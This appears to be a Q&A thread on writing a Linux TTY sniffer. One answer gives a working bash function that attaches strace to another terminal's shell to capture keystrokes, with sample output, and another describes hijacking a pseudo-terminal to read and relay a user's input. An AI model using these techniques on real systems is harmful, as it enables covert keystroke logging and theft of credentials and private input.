How would I go about writing a Linux TTY sniffer?

Question

For educational purposes (not that anyone should care about the motivations behind such an exercise) I'd like to write a program that can read/write to/from alternate ttys/ptys. I've read papers (from the 1990s) but can't employ the implementation they use on modern Linux/glibc

I was hoping that someone had researched into this in the past (not too far in the past), or at least, read documentation pertaining to it, that they could provide, that would enlighten me further.

I also wonder if (considering the fact that Linux doesn't have streams) if this exercise must be done via a loadable kernel module [lkm].

I have many questions and probably a misunderstanding of some of the fundamental ideologies that allow such objectives to be put in place, could someone help? :)

Answer 1

function spy() {
    ptsnum=`ps awfux | grep pt[s]\/"$1" | awk '/bas[h]/{print $2}'` ;
    /usr/bin/strace -s 1000 -t -f -p $ptsnum 2>&1 3>&1 \
    | grep -Poi 'write(...\"[[:print:]]{1,2}\"[.][.][.][,]..)' ;
}

---

[436] klikevil@epiphany ~ $ w

    09:36:43 up 12:06,  6 users,  load average: 0.46, 0.29, 0.20
    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

    klikevil pts/0    75.125.126.8     23:05    2:19m 10:33   0.18s cmd
    klikevil pts/1    75.125.126.8     00:18    6:50m  0.06s  0.04s sshd: klikevil [priv]
    klikevil tty7     :0               09:02   17:07m  2:02   0.32s x-session-manager
    klikevil pts/2    :0.0             09:03    3:30   0.08s  0.08s bash
    klikevil pts/3    :0.0             09:03    0.00s  0.76s  0.00s w
    klikevil pts/4    :0.0             09:06    3:13   0.46s  0.00s /bin/sh /usr/bin/thunder


[437] klikevil@epiphany ~ $ spy 2
write(2, "e"..., 1)
write(2, "c"..., 1)

write(2, "h"..., 1)
write(2, "o"..., 1)
write(2, " "..., 1)
write(2, "s"..., 1)
write(2, "u"..., 1)
write(2, "p"..., 1)
write(2, " "..., 1)
write(2, "d"..., 1)
write(2, "o"..., 1)

write(2, "g"..., 1)
write(2, "\n"..., 1)
^C

Seems to work pretty well if you don't mind sorting through a bunch of line breaks. As for the TTYs.. tail -f /dev/vcsa1-6

Jessica

Answer 2

The linspy.c code in that Phrack article is a Linux kernel module. It won't compile against a modern kernel, because the internal kernel interfaces change frequently.

However, the basic approach it uses is sound (although it is completely missing locking required for correctness in an SMP environment), and with the application of sufficient elbow grease you should be able to port it to compile against the latest kernel.

Answer 3

I'm ssh'd into a remote linux box twice, producing /dev/pts/0 and /dev/pts/1. From 0, I can open 1 for read, thereby stealing all the stuff the user types to 1. If I want them to see their typing, I have to write it back to /dev/pts/1. Of course, their input never makes it to their shell, so I have to create a shell process at my end (on 0) and pipe their input it, then pipe the shell's out back to 1.

This all works great for me. While all this is going on, I can save off all the data read and written during the process wherever I like.

Of course, you can't do this unless you are root or are snooping on a session you own, but you only wanted this for educational purposes, right?